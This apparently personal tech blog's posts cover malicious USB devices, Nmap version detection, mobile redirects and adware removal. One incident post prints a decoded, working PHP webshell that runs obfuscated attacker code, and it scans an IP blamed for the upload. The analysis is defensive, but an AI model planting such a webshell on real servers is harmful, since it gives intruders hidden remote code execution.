Saturday, June 29, 2013
Malicious hardware devices
Latest in the line is the iPhone charger malware PoC.
http://www.macworld.co.uk/ipad-iphone/news/?newsid=3450917
A very cool in-depth article on "Plug and Prey: Malicious USB Devices"
http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
And a very cool device, the "USB Rubber Ducky"
Next time, think twice before plugging in any new device you buy, especially if it looks as cute as the yellow ducky.
Saturday, June 1, 2013
Effective range of Wireless Router (dBi) antennas
I was shopping for a wireless adapter; they tend to come in many antenna configurations.
Amazon Alfa wireless usb adapter
Choose an antenna that meets your requirements.
9dBi dipole (1000m) ==> signal reaches far at the same horizontal elevation as the transmission point
7dBi dipole (620m) ==> offers an optimal balance between range and elevation
5dBi dipole (500m) ==> covers a couple of levels of a building
2dBi dipole (300m) ==> if you are in a building and need to cover the rooms around you
More information if you are interested.
http://www.liveport.com/wireless-antenna-properties
Thursday, January 24, 2013
Discovery of Webshell on Website
When a PHP file contains eval + gzinflate + base64_decode, expect it to be malicious in nature.
eval gzinflate base64_decode PHP decoder:
http://www.tareeinternet.com/scripts/decrypt.php
After decoding the file, we get a webshell with file upload capability.
// Silence every error so the shell leaves nothing in logs or in the response.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
// Branch 1: echo a GET parameter back (a simple "is the shell alive?" check).
if (isset($_GET['r'])) { print $_GET['r']; }
// Branch 2: run PHP supplied in POST 'e', hidden behind two rounds of base64 + rot13 and a reversal.
elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); }
// Branch 3: the "file upload": with Content-Encoding: binary, the raw request body is
// base64-encoded and appended to 'tmpfile', prefixed with the client IP.
elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
$data = file_get_contents('php://input');
if (strlen($data) > 0) print 'STATUS-IMPORT-OK';
if (strlen($data) > 12) {
$fp=@fopen('tmpfile','a');
@flock($fp, LOCK_EX);
@fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
@flock($fp, LOCK_UN);
@fclose($fp);
}
}
exit;
Update 25 Jan 2013:
Findings from the log indicate that 3 months ago someone from 80.237.132.113 uploaded the webshell using an FTP account.
The possibility that entry came from FTP brute force is very high, as I know the original password was not that complex.
80.237.132.113 is a webserver under construction.
80.237.132.113 could just be another victim of the intruder.
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
25/tcp open smtp Exim smtpd
80/tcp open http Apache httpd
110/tcp open pop3 Dovecot pop3d
137/tcp open netbios-ns?
138/tcp open netbios-dgm?
139/tcp open netbios-ssn?
143/tcp open imap Dovecot imapd
465/tcp open ssl/smtp Exim smtpd 4.X
587/tcp open smtp Exim
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
2195/tcp open unknown
3306/tcp open mysql MySQL 5.5.28-1~dotdeb.0-log
Mitigation:
Change password.
Monitor files.
Saturday, December 1, 2012
Detect Mobile and Perform Site redirection (modding detectmobilebrowsers scripts)
I was working on a freelance project setting up mobile sites for local businesses and stumbled upon the problem of how best to redirect "clients" to the respective mobile site. After some careful consideration and research on Google, this is what I came up with.
Goal:
- Accurate detection of mobile devices with little future maintenance
- Warn clients of the redirection and give them the option to reject our goodwill
- If a client chooses to view the full site, allow them to do so
Sample modded JS can be found here.
Summarized Solution:
- Download the modded JS.
- Add the JS to your site:
<script src="js/detectmobilebrowser.js"></script>
<script>
$(document).ready(function(){
runDetect();
});
</script>
- Add the runSet() function to the link to the full site:
<a href="http://thewanderingtech.blogspot.com" title="thewanderingtech.blogspot.com" target="_self" onClick="runSet()">View Full Site</a>
- Done. Test. Enjoy.
Long-winded solution + thinking process:
Accurate detection of mobile devices with little future maintenance
http://detectmobilebrowsers.com/ offers a free script to detect mobile devices.
I chose to use the JavaScript version of detectmobile as I want minimal disruption to how search engines crawl the main site. Think SEO.
Sample:
(function(a,b){if(/* long user-agent regex elided here */)window.location=b})(navigator.userAgent||navigator.vendor||window.opera,'http://www.google.com/');
The script works great, but I am not able to fulfill Goals 2 & 3. With such a compact script it could be daunting to web developers who are not comfortable with coding.
Warn clients of redirection and giving them the option to reject our goodwill
Simple solution using confirm()
Open detectmobilebrowser.js with a text editor of your choice.
Find
window.location=b
and Replace this string with
if(confirm('For best viewing experience we recommend redirecting to our mobile site')){window.location=b}
Save the js file and you are done. Feel free to change the message you want to display.
If client choose to view the full site, allow them to do so
Nothing is more frustrating than being forced to view a mobile site when all I want to do is view the full site on a mobile device.
Simple solution using a cookie to track the user's intention.
Create a cookie called view to track the user's intention.
If, on the mobile site, a user clicks the "view full site" link, we know that this mobile user wants to visit the full page and does not want to be redirected to the mobile site.
We set the cookie to last 1 day.
Therefore the user would only get redirected to the mobile site again the following day, or if he/she clears the browser cookies.
From http://www.w3schools.com/js/js_cookies.asp I added these functions to detectmobilebrowser.js:
function setCookie(c_name,value,exdays){ ... }
function getCookie(c_name) { ... }
The runSet() function records that the user wants to view our full site.
JS:
function runSet()
{
var view = getCookie("view");
setCookie("view","full",1);
}
HTML:
<a href="http://thewanderingtech.blogspot.com" title="thewanderingtech.blogspot.com" target="_self" onClick="runSet()">View Full Site</a>
The runDetect() function will trigger the mobile detection and redirection script as long as the cookie "view" is not set to the value "full".
function runDetect(){
var view = getCookie("view");
if(view != "full"){
(function(a,b){if(/* long user-agent regex elided here */)window.location=b})(navigator.userAgent||navigator.vendor||window.opera,'http://www.google.com/');
}
}
Sample modded JS can be found here.
Saturday, July 14, 2012
How NMAP Service Version Detection works
SERVICE/VERSION DETECTION on Nmap 6.01:
-sV: Probe open ports to determine service/version info
--version-intensity: Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
How does service/version detection in Nmap work?
In short, Nmap probes a port and attempts to grab any available banner, then matches the received banner against its database of banners. The database is stored in the Nmap directory, in a file called nmap-service-probes.
Nmap uses regular expressions to match the banner found. An example of how detection of the OpenSSH service works:
Rule found in nmap-service-probes:
match ssh m|^SSH-([\d.]+)-OpenSSH\r?\n$| p/OpenSSH/ i/protocol $1/ d/terminal server/
"ssh" (green in the original): tells Nmap which service is matched
"m|^SSH-([\d.]+)-OpenSSH\r?\n$|" (blue): the pattern the received banner must match
"p/OpenSSH/ i/protocol $1/ d/terminal server/" (red): what Nmap reports back to us, the product and the version info, with $1 filled from the first capture group
Linux Console:
Have netcat listen on a random port and send out an SSH banner string:
echo -ne "SSH-2.0-OpenSSH_2.5\r\n" | nc -l 222
Have Nmap try service detection on the port you have just opened (I have chosen port 222):
nmap -sV -PN -p 222 127.0.0.1
RESULT:
[root@localhost user]# nmap -sV -PN -p 222 127.0.0.1
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-13 19:51 PDT
PORT STATE SERVICE VERSION
222/tcp open ssh OpenSSH 2.5 (protocol 2.0)
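To make the matching step concrete, here is an added Python example (mine, not Nmap's code) that reads match lines in the nmap-service-probes format, applies the Perl-style regex to a captured banner and expands the $1/$2 references in the p/, v/ and i/ fields the way the VERSION column above is built. The two match lines are constructed for the example: the ssh one is modelled on the rule quoted above but carries a second capture group and a v/ field, because the abbreviated rule as quoted has no version field and on its own would not produce the "2.5" in the result. Only the match keyword with / as the field delimiter is handled; real probe files also contain Probe, softmatch and ports directives that this skips.

```python
import re

# Constructed match lines in nmap-service-probes syntax (not copied from the
# real file). The ssh line follows the one quoted in the post but adds a
# second capture group so the version can be reported via v/$2/.
PROBE_LINES = [
    r"match ssh m|^SSH-([\d.]+)-OpenSSH[_-]([\w.]+)\r?\n| p/OpenSSH/ v/$2/ i/protocol $1/",
    r"match ftp m|^220 ProFTPD ([\d.]+) Server| p/ProFTPD/ v/$1/",
]

# match <service> m<delim>regex<delim><flags> <fields...>
MATCH_LINE = re.compile(r"^match\s+(\S+)\s+m(.)(.*?)\2([a-z]*)\s*(.*)$")
# p/product/ v/version/ i/info/ d/devicetype/ h/hostname/ o/os/
FIELD = re.compile(r"([pvidho])/([^/]*)/")


def parse_match(line):
    """Turn one 'match' directive into a dict with a compiled regex."""
    m = MATCH_LINE.match(line)
    if not m:
        raise ValueError("not a match directive: %r" % line)
    service, _delim, pattern, flags, rest = m.groups()
    reflags = 0
    if "i" in flags:
        reflags |= re.IGNORECASE
    if "s" in flags:
        reflags |= re.DOTALL
    return {"service": service, "regex": re.compile(pattern, reflags),
            "fields": dict(FIELD.findall(rest))}


def expand(template, match):
    """Replace $1, $2, ... with the corresponding capture groups."""
    return re.sub(r"\$(\d+)", lambda g: match.group(int(g.group(1))) or "", template)


def identify(banner, probes=None):
    """Return (service, description) for a banner, first match wins, formatted
    the way the -sV VERSION column shows it: product, version and (info)."""
    if probes is None:
        probes = [parse_match(line) for line in PROBE_LINES]
    for probe in probes:
        m = probe["regex"].search(banner)
        if not m:
            continue
        f = {k: expand(v, m) for k, v in probe["fields"].items()}
        desc = f.get("p", "")
        if f.get("v"):
            desc += " " + f["v"]
        if f.get("i"):
            desc += " (" + f["i"] + ")"
        return probe["service"], desc
    return None, "unknown"


if __name__ == "__main__":
    # The banner the netcat listener above sends.
    print(identify("SSH-2.0-OpenSSH_2.5\r\n"))  # ('ssh', 'OpenSSH 2.5 (protocol 2.0)')
    # A constructed FTP banner for the second rule.
    print(identify("220 ProFTPD 1.3.3 Server (Debian) ready\r\n"))
```

Feeding the rule quoted in the post through parse_match is a handy sanity check when you write your own rules: the fields come back as p, i and d, and the regex is compiled exactly as Nmap would see it, so you can test it against a banner captured from the real service before adding it to nmap-service-probes.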
Saturday, December 17, 2011
Fast Guide to hosting webpages or website
Want to host your own webpage on your own desktop? Not tech savvy, or too lazy to configure a proper server for hosting your pages? Does setting up Apache give you a headache?
If you merely need to host files without PHP/Perl support, AnalogX is a free and good tool I would recommend.
1) Download & Install it
http://www.analogx.com/contents/download/Network/sswww/Freeware.htm
2) Launch it

Click the middle box to select the directory you are serving your files from.
Click the start button; if your port 80 is not occupied, the server should work.
Moment of truth:
Place an index.html file in the selected directory.
Surf to that index.html by typing http://127.0.0.1/index.html in your web browser.
If your site needs PHP, Perl, SSL support, MySQL and many more ..............
I would recommend this excellent tool, XAMPP.
1) Download & Install XAMPP here.
http://www.apachefriends.org/en/xampp.html
2) Launch it

Click start on the box beside Apache.
Place your files in
Surf to that index.html by typing http://127.0.0.1/index.html in your web browser.
oxymoron alert ................
For Linux users who are not tech savvy.
Most Linux distributions should already have a web server installed by default.
Do a quick check by typing (without quotes) "which httpd" in a Terminal (the Linux version of cmd.exe).
If you see a path then congrats, you already have a server.
If not, install it with this command: yum install httpd
PS: if your Linux distribution is no longer supported (EOL) then yum would not work.
Where should your HTML files be placed?
My default path is /var/www/
If yours is not the same path, then I would suggest searching httpd.conf for your root directory.
The default path to httpd.conf is /etc/httpd/conf/httpd.conf
To configure the httpd server, edit the httpd.conf file and restart the httpd server.
To start or restart your httpd server use this command: service httpd restart
Saturday, October 15, 2011
How to remove persistent Malware (RelevantKnowledge)
Search Google for "RelevantKnowledge" and you will find removal instructions within the top 10 results.
In my post I will introduce a more generic step-by-step approach so you can remove most common malware on your own.
Anyway, I am writing this post because I was infected with a malware called RelevantKnowledge.
Summary: remove RelevantKnowledge on Win7 64-bit FAST:
1) Stop the RelevantKnowledge service.
a) Run msconfig
b) In msconfig, click the Services tab
c) Find RelevantKnowledge and uncheck it
d) Click Apply and close msconfig
2) Reboot the PC
3) Delete all the files from c:\Program Files (x86)\RelevantKnowledge\
For more detailed info on malware removal, read the rest of the entry.
General idea of what malware is:
Malware is simply software that you do not want on your PC.
Some leech on your network or steal your credentials, while others allow the "hacker" to use your PC.
It is very likely you got infected from some malicious website.
After installing itself on your PC it needs a method to start itself up every time you turn on your PC.
The few common ways for it to do that include:
Run key
Service
Startup folder
WMI
Case Study: From what I can observe, RelevantKnowledge is merely a nuisance, generating ad pop-ups when surfing the net.
I am running Win7 64-bit with no AV scanner installed.
So how did I find this bugger!!! I became suspicious after constantly receiving this pop-up while surfing the net.

I proceeded to look for suspicious run keys and services on my system.
Type msconfig in Run or cmd.exe:
The Startup tab lists software that starts via run keys.
The Services tab lists software that starts as a service.
So how do I tell what is suspicious?
Spelling errors / unknown programs / unknown or missing manufacturer info.
Next, Google those suspicious programs to verify whether they are authentic or not.
And that is how I caught RelevantKnowledge, which installed itself as a service called "RelevantKnowledge".
Next, find out where it is installed on my system.
I prefer to use regedit, export HKLM and search for the keys in my own text editor. You can also choose to search from regedit directly, but I do not recommend that.
Highlight HKEY_LOCAL_MACHINE => ctrl+f => export => save it to the desktop as hklm.reg

Open hklm.reg using a text editor (I recommend UltraEdit or Notepad++) and search for relevantknowledge.

Based on the filtered results I know it is installed in "C:\Program Files (x86)\RelevantKnowledge\".
A total of 36 unwanted registry entries.
I repeated the above steps for HKEY_CURRENT_USER (HKCU). It seems RelevantKnowledge did not have any entry in HKCU.
So what do HKCU and HKLM imply?
HKCU implies that the software started by this registry key runs with the current user's rights.
HKLM implies that the software started by this registry key runs with system rights.
Next step -> Remove the startup entries from the registry.
This step ensures that on the next reboot the malware will not run.
So there are 36 entries; you could choose to remove them all, or remove just the services or run keys, if any.
Filtered results:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\RelevantKnowledge]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RelevantKnowledge]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RelevantKnowledge]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RelevantKnowledge]
Commands to delete the registry entries in cmd.exe:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\RelevantKnowledge"
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RelevantKnowledge"
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RelevantKnowledge"
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RelevantKnowledge"
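The export-and-search step can be scripted so that the same keyword search over hklm.reg also tells you which persistence mechanism each hit belongs to and emits the matching reg delete commands. This is an added Python example, not part of the post: parse_reg reads the [key] / "name"=value layout of a regedit export, find_persistence looks for the keyword in key paths, value names and value data, and classify labels Services keys, msconfig's disabled-services record and Run/RunOnce keys. SAMPLE_REG is a constructed fragment: the four service keys are the ones listed above, while the Run value, the "Legit Updater" entry and PLACEHOLDER.exe are invented. The generated commands add /f so reg does not prompt, and /v so that only the one value in a shared key such as ...\Run is removed rather than the whole key.

```python
import re
from collections import OrderedDict

# Constructed fragment of an hklm.reg export (not a real one). The four
# service keys are the ones quoted in the post; the Run value, the "Legit
# Updater" entry and PLACEHOLDER.exe are invented for the example.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Legit Updater"="C:\\Program Files\\SomeVendor\\updater.exe"
"rk-updater"="C:\\Program Files (x86)\\RelevantKnowledge\\PLACEHOLDER.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\RelevantKnowledge]
"state"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RelevantKnowledge]
"ImagePath"="C:\\Program Files (x86)\\RelevantKnowledge\\PLACEHOLDER.exe"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RelevantKnowledge]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RelevantKnowledge]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Dhcp]
"Start"=dword:00000002
"""


def load_reg(path):
    """Read a regedit export from disk; regedit writes them as UTF-16 LE with a BOM."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


def parse_reg(text):
    """Map each [key] to its list of (value name, raw value) pairs."""
    keys = OrderedDict()
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, [])
        elif current is not None and line.startswith(('"', "@")) and "=" in line:
            name, _, value = line.partition("=")
            keys[current].append((name.strip('"'), value))
    return keys


def classify(key):
    """Which autostart mechanism from the post's list a key belongs to."""
    k = key.lower()
    if "\\msconfig\\services\\" in k:
        return "msconfig-disabled-service"
    if "\\services\\" in k:
        return "service"
    if k.endswith("\\run") or k.endswith("\\runonce"):
        return "run-key"
    return "other"


def find_persistence(text, keyword):
    """Hits where the keyword appears in the key path, a value name or value data."""
    kw = keyword.lower()
    hits = []
    for key, values in parse_reg(text).items():
        hive = key.split("\\", 1)[0]
        if kw in key.lower():
            hits.append({"key": key, "value": None, "kind": classify(key), "hive": hive})
            continue
        for name, value in values:
            if kw in name.lower() or kw in value.lower():
                hits.append({"key": key, "value": name, "kind": classify(key), "hive": hive})
    return hits


def removal_commands(hits):
    """reg delete lines: the whole key when the key itself matched, else one value."""
    cmds = []
    for h in hits:
        if h["value"] is None:
            cmds.append('reg delete "%s" /f' % h["key"])
        else:
            cmds.append('reg delete "%s" /v "%s" /f' % (h["key"], h["value"]))
    return cmds


if __name__ == "__main__":
    found = find_persistence(SAMPLE_REG, "RelevantKnowledge")
    for h in found:
        where = h["key"] + (" -> " + h["value"] if h["value"] else "")
        print("%-26s %s %s" % (h["kind"], h["hive"], where))
    print("\n".join(removal_commands(found)))
```

Use load_reg on the real hklm.reg and hkcu.reg exports instead of SAMPLE_REG. Review the generated commands before running them: a value hit inside a shared key like ...\CurrentVersion\Run is deleted with /v so the legitimate neighbours stay, but a whole-key hit removes everything under it. The Startup folder and WMI subscriptions from the list above never appear in a .reg export, so they still need their own checks.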
Finally -> Delete the physical files:
This is where the malware resides. But I cannot delete all the files yet because the malware is still running.
RelevantKnowledge runs exe files and also hooks DLLs into running processes such as chrome.exe.
To check if the malware is running I prefer to use the traditional cmd.exe (run as administrator).
Use the tasklist command to check for running exes. Search and see if any of the RelevantKnowledge exes are running.

Use tasklist /m to list the DLLs loaded into each process.

So they are running; what can I do?
The easiest way is to reboot your PC; if you have deleted the registry keys successfully then it should not be loaded on the next startup.
The alternative method (not recommended) requires you to taskkill all malware-related exes, meaning even legitimate exes such as chrome.exe that the malware DLL was loaded into must be killed off.
After the malware is unloaded, proceed to delete the physical files.

Now your malware should be deleted. Do note there are many variants of these buggers. Some include a watchdog process which reinstalls the malware if it detects that it is not running or not started. In such a case we need to find where the watchdog process is hiding in the system and delete it together with the malware.
